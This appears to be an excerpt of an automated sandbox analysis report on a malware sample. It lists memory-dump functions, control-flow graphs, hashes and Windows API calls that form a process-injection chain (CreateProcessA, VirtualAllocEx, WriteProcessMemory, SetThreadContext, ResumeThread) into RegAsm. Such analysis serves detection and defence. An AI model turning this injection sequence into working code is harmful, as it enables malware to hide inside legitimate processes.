                                                    • Source File: 00000005.00000002.1537684400.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1550000_x.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: bb0ac12806fd2dc26397681eb4190ccbe0285ee5f0db45ce1ad1c51b0ff924de
                                                    • Instruction ID: 968de0ff3199125e13d0610573db37aa9e0d2f909ff8a08f7edf2e48d7846ec1
                                                    • Opcode Fuzzy Hash: bb0ac12806fd2dc26397681eb4190ccbe0285ee5f0db45ce1ad1c51b0ff924de
                                                    • Instruction Fuzzy Hash: E1D13970D002598FDF60CFA8C8907EDBBF1BB49304F0095AAD959AB290DB749A85CF95
                                                    Function 01556371 Relevance: 1.8, APIs: 1, Instructions: 340processCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 529 1556371-155641b 532 155647d-15564a8 529->532 533 155641d-155644d 529->533 536 155650a-1556563 532->536 537 15564aa-15564da 532->537 533->532 539 155644f-1556454 533->539 544 1556565-1556592 536->544 545 15565c2-15566ae CreateProcessA 536->545 537->536 549 15564dc-15564e1 537->549 542 1556477-155647a 539->542 543 1556456-1556460 539->543 542->532 546 1556464-1556473 543->546 547 1556462 543->547 544->545 560 1556594-1556599 544->560 568 15566b7-1556791 545->568 569 15566b0-15566b6 545->569 546->546 550 1556475 546->550 547->546 553 1556504-1556507 549->553 554 15564e3-15564ed 549->554 550->542 553->536 555 15564f1-1556500 554->555 556 15564ef 554->556 555->555 559 1556502 555->559 556->555 559->553 562 15565bc-15565bf 560->562 563 155659b-15565a5 560->563 562->545 564 15565a7 563->564 565 15565a9-15565b8 563->565 564->565 565->565 566 15565ba 565->566 566->562 580 15567a1-15567a5 568->580 581 1556793-1556797 568->581 569->568 583 15567b5-15567b9 580->583 584 15567a7-15567ab 580->584 581->580 582 1556799 581->582 582->580 586 15567c9-15567cd 583->586 587 15567bb-15567bf 583->587 584->583 585 15567ad 584->585 585->583 589 1556803-155680e 586->589 590 15567cf-15567f8 586->590 587->586 588 15567c1 587->588 588->586 594 155680f 589->594 590->589 594->594
                                                    APIs
                                                    • CreateProcessA.KERNELBASE(?,?,03FA358C,03FA3590,0155630E,?,?,?,?,?), ref: 0155669B
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1537684400.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1550000_x.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: fde0216a976325906296cdc3eaa446b10fa3036728edc93822ecb1e2ffb15424
                                                    • Instruction ID: 8f26d6527eda9cebb1c4ee25998b39609393929d4af9ed199e9374fcea6aca75
                                                    • Opcode Fuzzy Hash: fde0216a976325906296cdc3eaa446b10fa3036728edc93822ecb1e2ffb15424
                                                    • Instruction Fuzzy Hash: 44D12970D002598FDF60CFA8D890BEDBBF1BB49304F0091AAD959BB250DB749A85CF55
                                                    Function 015570C8 Relevance: 1.6, APIs: 1, Instructions: 127injectionCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 595 15570c8-15570cd 596 155711f 595->596 597 15570cf-1557118 595->597 598 1557154-1557155 596->598 599 1557120-155713f 596->599 597->596 600 1557156-15571b5 WriteProcessMemory 598->600 599->600 601 1557141-1557153 599->601 602 15571b7-15571bd 600->602 603 15571be-1557208 600->603 601->600 602->603
                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000), ref: 015571A5
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1537684400.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1550000_x.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: a7613ec39099839fa08a54b9dbbb18370923d9a2913f8edb538587cd6512e068
                                                    • Instruction ID: 6b8dfc9bff6425273cc92549c42c725b8680e99ef69ae9c5fb04e5e6a754775f
                                                    • Opcode Fuzzy Hash: a7613ec39099839fa08a54b9dbbb18370923d9a2913f8edb538587cd6512e068
                                                    • Instruction Fuzzy Hash: DC41AAB5D012589FDB10CFA9D880AEEFBF1BF49310F24942AE818BB210D335A945CF54
                                                    Function 0155570C Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 607 155570c-155713f 610 1557156-15571b5 WriteProcessMemory 607->610 611 1557141-1557153 607->611 612 15571b7-15571bd 610->612 613 15571be-1557208 610->613 611->610 612->613
                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000), ref: 015571A5
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1537684400.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1550000_x.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: c3f193c754e905b4b2732079b09f7664ae4109dc92caca734dc5f9c01b4a5fa5
                                                    • Instruction ID: 024a37f0c50b435af23d1ae726320b45547b2736fddef98f3bf77b0ad3ee3f74
                                                    • Opcode Fuzzy Hash: c3f193c754e905b4b2732079b09f7664ae4109dc92caca734dc5f9c01b4a5fa5
                                                    • Instruction Fuzzy Hash: 484189B5D002589FDF10CFA9D984ADEFBF1BB49310F24942AE818BB210D374A945CF64
                                                    Function 015556DC Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 617 15556dc-1556be4 ReadProcessMemory 620 1556be6-1556bec 617->620 621 1556bed-1556c37 617->621 620->621
                                                    APIs
                                                    • ReadProcessMemory.KERNELBASE(00000004,?,01556AF3,?,?), ref: 01556BD4
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1537684400.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1550000_x.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    • Opcode ID: a56796789ff6e147d7b775345b4bb43ffe7f30a5bd97764c0fd4be24d0b65a33
                                                    • Instruction ID: 921517af619065945131de35f18e645114093a5124e53a3a3cf04c9a38dd937d
                                                    • Opcode Fuzzy Hash: a56796789ff6e147d7b775345b4bb43ffe7f30a5bd97764c0fd4be24d0b65a33
                                                    • Instruction Fuzzy Hash: 0F4168B9D052589FCF10CFA9D984ADEFBF1BB09310F14942AE914BB210D375A945CF68
                                                    Function 01556B19 Relevance: 1.6, APIs: 1, Instructions: 107COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 625 1556b19-1556be4 ReadProcessMemory 627 1556be6-1556bec 625->627 628 1556bed-1556c37 625->628 627->628
                                                    APIs
                                                    • ReadProcessMemory.KERNELBASE(00000004,?,01556AF3,?,?), ref: 01556BD4
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1537684400.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1550000_x.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    • Opcode ID: 9b11453bc301f278362796d36af9a6fb647a05f24a0e5d0bd76d0fbcd451702f
                                                    • Instruction ID: e5d794b7b65224dde73c4acbc57987612570a6837b7b207e019b635b85be6ba3
                                                    • Opcode Fuzzy Hash: 9b11453bc301f278362796d36af9a6fb647a05f24a0e5d0bd76d0fbcd451702f
                                                    • Instruction Fuzzy Hash: F74178B9D052589FCF10CFA9D984ADEFBF1BB09310F10902AE814BB210D375A941CF64
                                                    Function 015556F4 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 632 15556f4-1556de4 VirtualAllocEx 635 1556de6-1556dec 632->635 636 1556ded-1556e2f 632->636 635->636
                                                    APIs
                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 01556DD4
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1537684400.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1550000_x.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 70d2b985288bbe0b308cae8f5b5ae65a9c24bd236b166dd5820aa0e538216969
                                                    • Instruction ID: 1e62dbecb75727c9ab9da9a44e7f8cf01ec3eecf255c93db20e0e39bad1cef3f
                                                    • Opcode Fuzzy Hash: 70d2b985288bbe0b308cae8f5b5ae65a9c24bd236b166dd5820aa0e538216969
                                                    • Instruction Fuzzy Hash: 654177B9D052989FCF10CFA9D984A9EFBF1BB09310F10941AE814BB310D775A941CF64
                                                    Function 01556D20 Relevance: 1.6, APIs: 1, Instructions: 102memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 640 1556d20-1556d68 641 1556d70-1556de4 VirtualAllocEx 640->641 642 1556de6-1556dec 641->642 643 1556ded-1556e2f 641->643 642->643
                                                    APIs
                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 01556DD4
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1537684400.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1550000_x.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 9e3e1a2c822eff0e8f2f9a6b428fa2c2ac27a331ee1a4d321ded46bdfeaa6713
                                                    • Instruction ID: 5d88570f754b567abc7304ea34be9c1946fe362642efdf8d44a9f823a22474c1
                                                    • Opcode Fuzzy Hash: 9e3e1a2c822eff0e8f2f9a6b428fa2c2ac27a331ee1a4d321ded46bdfeaa6713
                                                    • Instruction Fuzzy Hash: C44156B9D012589FCB10CFA9D984ADEFBF1BB59310F14942AE814BB210D375A945CF64
                                                    Function 01555724 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 01556A41
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1537684400.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1550000_x.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    • Opcode ID: 773f9e739b1cc651e1118574d13003f1abee58b46600b32386633d5d8e07fdbb
                                                    • Instruction ID: 65ee2deba2294535e1ef1adc3f09be58e22eeb555426d008bd39b8a076b49cd5
                                                    • Opcode Fuzzy Hash: 773f9e739b1cc651e1118574d13003f1abee58b46600b32386633d5d8e07fdbb
                                                    • Instruction Fuzzy Hash: 5341A9B5D01258DFDB10CFAAD984ADEFBF0BB48310F10802AE818BB250D774A945CF54
                                                    Function 01551BD1 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 647 1551bd1-1551c8f VirtualProtect 649 1551c91-1551c97 647->649 650 1551c98-1551cd4 647->650 649->650
                                                    APIs
                                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 01551C7F
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1537684400.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1550000_x.jbxd
                                                    Similarity
                                                    • API ID: ProtectVirtual
                                                    • String ID:
                                                    • API String ID: 544645111-0
                                                    • Opcode ID: 371cb337d70ed41aea4d209b7b19286e638af9efe4e6aaa6e974b7db05b676d7
                                                    • Instruction ID: 8482091666f747e17b034d56eb5d3962330f4080320a41df7b09ed4b4949b1a9
                                                    • Opcode Fuzzy Hash: 371cb337d70ed41aea4d209b7b19286e638af9efe4e6aaa6e974b7db05b676d7
                                                    • Instruction Fuzzy Hash: 5A3198B9D042589FCB14CFA9E584AEEFBF1BB19310F24902AE824B7210D375A945CF64
                                                    Function 015556B4 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 653 15556b4-15569f4 656 15569f6-1556a08 653->656 657 1556a0b-1556a51 Wow64SetThreadContext 653->657 656->657 658 1556a53-1556a59 657->658 659 1556a5a-1556a9e 657->659 658->659
                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 01556A41
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1537684400.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1550000_x.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    • Opcode ID: b9364fba950a47b1ad7262a3ea72a1ecc0691321445e9ec21fdae3036d28fbdd
                                                    • Instruction ID: 68e5aef2f53724904a41e6ea4c7785936f348338cd5bb2b446100ce24674fc53
                                                    • Opcode Fuzzy Hash: b9364fba950a47b1ad7262a3ea72a1ecc0691321445e9ec21fdae3036d28fbdd
                                                    • Instruction Fuzzy Hash: D341A9B5D01258DFDB10CFAAD984ADEFBF0BB49310F10802AE818BB250D774A945CF54
                                                    Function 01556989 Relevance: 1.6, APIs: 1, Instructions: 95threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 01556A41
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1537684400.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1550000_x.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    • Opcode ID: 58fea998e491f61ddcdb19870221682dd3d22958d6ec88d3a8569a4098423644
                                                    • Instruction ID: 6230cb4a1b1b3c7a86287b32da0754751ba0a400f859e2f8ba70e6b617db5651
                                                    • Opcode Fuzzy Hash: 58fea998e491f61ddcdb19870221682dd3d22958d6ec88d3a8569a4098423644
                                                    • Instruction Fuzzy Hash: 6F4199B5D01258DFDB10CFAAD984AEEFBF0BB49314F10802AE419B7250D778A945CF54
                                                    Function 01551BD8 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 01551C7F
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1537684400.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1550000_x.jbxd
                                                    Similarity
                                                    • API ID: ProtectVirtual
                                                    • String ID:
                                                    • API String ID: 544645111-0
                                                    • Opcode ID: 337eed4c0aaff607a3b553f24b231e7f324f5053d804155afb95b6b1ae097de5
                                                    • Instruction ID: 954241645178f8bd9add2a8c8938325856e0ed209aedeaaccdbb3cec987e8bd8
                                                    • Opcode Fuzzy Hash: 337eed4c0aaff607a3b553f24b231e7f324f5053d804155afb95b6b1ae097de5
                                                    • Instruction Fuzzy Hash: D03177B9D042589FCB14CFAAD984ADEFBF1BB19310F24902AE824B7210D775A945CF64
                                                    Function 0155573C Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ResumeThread.KERNELBASE(00000000), ref: 015574ED
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1537684400.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1550000_x.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: f2c8a32afb331616b69f5527dae41297433e3e4906e20ebfddba22877d401fcc
                                                    • Instruction ID: 2349e8413e8f5dfb94e01d2b4b11e39074fa81cd0b3bb99575dbcd28367700a9
                                                    • Opcode Fuzzy Hash: f2c8a32afb331616b69f5527dae41297433e3e4906e20ebfddba22877d401fcc
                                                    • Instruction Fuzzy Hash: 823198B5D012589FDB10CFAAD884A9EFBF4BB09314F10946AE915B7310D774A901CFA8
                                                    Function 01557468 Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ResumeThread.KERNELBASE(00000000), ref: 015574ED
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1537684400.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1550000_x.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: 9b51ace3b9e7bb1102b23f6b57c928aff1af400458afdd5a5a121549eccad30b
                                                    • Instruction ID: bd7b5bc6e4ac0331697c862496f6910c75c694ad81fd6ff4299d5f0e6acc858d
                                                    • Opcode Fuzzy Hash: 9b51ace3b9e7bb1102b23f6b57c928aff1af400458afdd5a5a121549eccad30b
                                                    • Instruction Fuzzy Hash: BA31A6B4D012589FDB14CFA9E880AEEBBF0BB49314F10902AE818B7310D334A905CF64
                                                    Function 01557160 Relevance: 1.6, APIs: 1, Instructions: 67injectionCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000), ref: 015571A5
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1537684400.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1550000_x.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: ca6d3c2b1d0a7ac6a0316c0d4d7340f1897ba2010ef6be7b090f7dc6bdda1af5
                                                    • Instruction ID: 07249742ff7a3faf4d55c09409b65b26d97f0296bc26833731c0c8781e8da64f
                                                    • Opcode Fuzzy Hash: ca6d3c2b1d0a7ac6a0316c0d4d7340f1897ba2010ef6be7b090f7dc6bdda1af5
                                                    • Instruction Fuzzy Hash: 8C219A79D00258DFDF00CFE8E884AEDBBF1BF09314F24545AE918AB210C335A985DB14
                                                    Function 014FD3D8 Relevance: .1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1535943695.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_14fd000_x.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e30c20cf09839ac1508e84dedf253d4cc8349fdc8bd3aaac5a2baff7f0358df5
                                                    • Instruction ID: 13e7b9ee5eeed483ac7a5426cf58a9e4bbdcf1b53cabd80fef6375dd65db7e05
                                                    • Opcode Fuzzy Hash: e30c20cf09839ac1508e84dedf253d4cc8349fdc8bd3aaac5a2baff7f0358df5
                                                    • Instruction Fuzzy Hash: 57210671904204DFDB05DF54D9C0B56BBA5FB84314F20C17EEA090B366C336E456CAA2
                                                    Function 014FD3D3 Relevance: .1, Instructions: 56COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1535943695.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_14fd000_x.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 01a772179decf110bb882872cb952e1b13b119dd61991aef1ad72797cf3e64a4
                                                    • Instruction ID: 3c97537bddd423bc4fd307d6bd3ee5c825a66116b39a5f770135639ec9588b39
                                                    • Opcode Fuzzy Hash: 01a772179decf110bb882872cb952e1b13b119dd61991aef1ad72797cf3e64a4
                                                    • Instruction Fuzzy Hash: B111CD72804240CFCB02CF44D9C4B56BF61FB84224F2482AAD9090A766C33AE45ACBA2

                                                    Execution Graph

                                                    Execution Coverage:0.9%
                                                    Dynamic/Decrypted Code Coverage:5.6%
                                                    Signature Coverage:5.6%
                                                    Total number of Nodes:90
                                                    Total number of Limit Nodes:8
                                                    execution_graph 79598 424ae3 79599 424aff 79598->79599 79600 424b27 79599->79600 79601 424b3b 79599->79601 79603 42c833 NtClose 79600->79603 79608 42c833 79601->79608 79605 424b30 79603->79605 79604 424b44 79611 42ea83 RtlAllocateHeap 79604->79611 79607 424b4f 79609 42c850 79608->79609 79610 42c861 NtClose 79609->79610 79610->79604 79611->79607 79612 42fa63 79615 42e963 79612->79615 79618 42cbb3 79615->79618 79617 42e97c 79619 42cbd0 79618->79619 79620 42cbe1 RtlFreeHeap 79619->79620 79620->79617 79621 42fa03 79622 42fa13 79621->79622 79623 42fa19 79621->79623 79626 42ea43 79623->79626 79625 42fa3f 79629 42cb63 79626->79629 79628 42ea5e 79628->79625 79630 42cb7d 79629->79630 79631 42cb8e RtlAllocateHeap 79630->79631 79631->79628 79701 424e73 79702 424e8c 79701->79702 79703 424f1c 79702->79703 79704 424ed7 79702->79704 79707 424f17 79702->79707 79705 42e963 RtlFreeHeap 79704->79705 79706 424ee7 79705->79706 79708 42e963 RtlFreeHeap 79707->79708 79708->79703 79709 42be33 79710 42be4d 79709->79710 79713 2f82df0 LdrInitializeThunk 79710->79713 79711 42be75 79713->79711 79632 413d03 79636 413d23 79632->79636 79633 413d8c 79635 413d82 79636->79633 79637 41b493 RtlFreeHeap LdrInitializeThunk 79636->79637 79637->79635 79638 4019c9 79639 4019d0 79638->79639 79642 42fed3 79639->79642 79645 42e4e3 79642->79645 79646 42e509 79645->79646 79655 407433 79646->79655 79648 42e532 79654 401a7d 79648->79654 79658 41b183 79648->79658 79650 42e551 79651 42e566 79650->79651 79652 42cc03 ExitProcess 79650->79652 79669 42cc03 79651->79669 79652->79651 79657 407440 79655->79657 79672 416503 79655->79672 79657->79648 79659 41b1af 79658->79659 79690 41b073 79659->79690 79662 41b1f4 79665 42c833 NtClose 79662->79665 79667 41b210 79662->79667 79663 41b1dc 79664 42c833 NtClose 79663->79664 79666 41b1e7 79663->79666 79664->79666 79668 41b206 79665->79668 79666->79650 79667->79650 79668->79650 79670 42cc20 79669->79670 79671 42cc31 ExitProcess 79670->79671 79671->79654 79673 416520 79672->79673 79675 416539 79673->79675 79676 42d2b3 79673->79676 79675->79657 79677 42d2cd 79676->79677 79678 42d2fc 79677->79678 79683 42be83 79677->79683 79678->79675 79681 42e963 RtlFreeHeap 79682 42d375 79681->79682 79682->79675 79684 42bea0 79683->79684 79687 2f82c0a 79684->79687 79685 42becc 79685->79681 79688 2f82c1f LdrInitializeThunk 79687->79688 79689 2f82c11 79687->79689 79688->79685 79689->79685 79691 41b169 79690->79691 79692 41b08d 79690->79692 79691->79662 79691->79663 79696 42bf23 79692->79696 79695 42c833 NtClose 79695->79691 79697 42bf3d 79696->79697 79700 2f835c0 LdrInitializeThunk 79697->79700 79698 41b15d 79698->79695 79700->79698

                                                    Executed Functions

                                                    Function 00417843 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004178B5
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1906683067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    • Opcode ID: d276421173cf687d4da18ee70c10a74da0251341815ac795ec8e8929a122fe15
                                                    • Instruction ID: b941e60ca3f62838519655cb4f68f2195a83dc963b9eb846a7a048a7f5ed3efa
                                                    • Opcode Fuzzy Hash: d276421173cf687d4da18ee70c10a74da0251341815ac795ec8e8929a122fe15
                                                    • Instruction Fuzzy Hash: 38015EB1E0020DABDF10EBA1DD42FDEB7B89B54308F4041AAE90897241F634EB48CB95
                                                    Function 0042C833 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 60 42c833-42c86f call 404843 call 42daa3 NtClose
                                                    APIs
                                                    • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C86A
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1906683067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    • Opcode ID: d45a263da7f6dd4469a1a1a247969d8357517c2d6f6db2603c20165a0982af4e
                                                    • Instruction ID: a37e8a755e4eb21cfd81982cbe231d9cc531cb8622e1a99dffd464884d723560
                                                    • Opcode Fuzzy Hash: d45a263da7f6dd4469a1a1a247969d8357517c2d6f6db2603c20165a0982af4e
                                                    • Instruction Fuzzy Hash: 89E04F763046147BD210BA5ADC01F9B776CDBC6714F50441AFA4867186C6707A0086A5
                                                    Function 02F835C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 76 2f835c0-2f835cc LdrInitializeThunk
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 8f3866d7d2d5adddc23304e41d23dc1c37c1f2959c8d028e1b4d278e550033cd
                                                    • Instruction ID: 3dd327ad592b836d216c5a0fea452bc21d166b5b609cb5d8f1eaa59314ee2e0d
                                                    • Opcode Fuzzy Hash: 8f3866d7d2d5adddc23304e41d23dc1c37c1f2959c8d028e1b4d278e550033cd
                                                    • Instruction Fuzzy Hash: BD90023160550412E50071588514707100587D1281F65C411A1428568D87958A5165A6
                                                    Function 02F82C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 74 2f82c70-2f82c7c LdrInitializeThunk
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 773feac4da1cf94cc9a9d6d5ab664da5ca9d2be6bacb40ab4cb52342ead821f1
                                                    • Instruction ID: fe541b76cf718b741c8e8717f9d1e7dde3d4b8e2d826e2ae9b789db012ca2412
                                                    • Opcode Fuzzy Hash: 773feac4da1cf94cc9a9d6d5ab664da5ca9d2be6bacb40ab4cb52342ead821f1
                                                    • Instruction Fuzzy Hash: CB90023120148812E5107158C40474B000587D1381F59C411A5428658D869589917125
                                                    Function 02F82DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

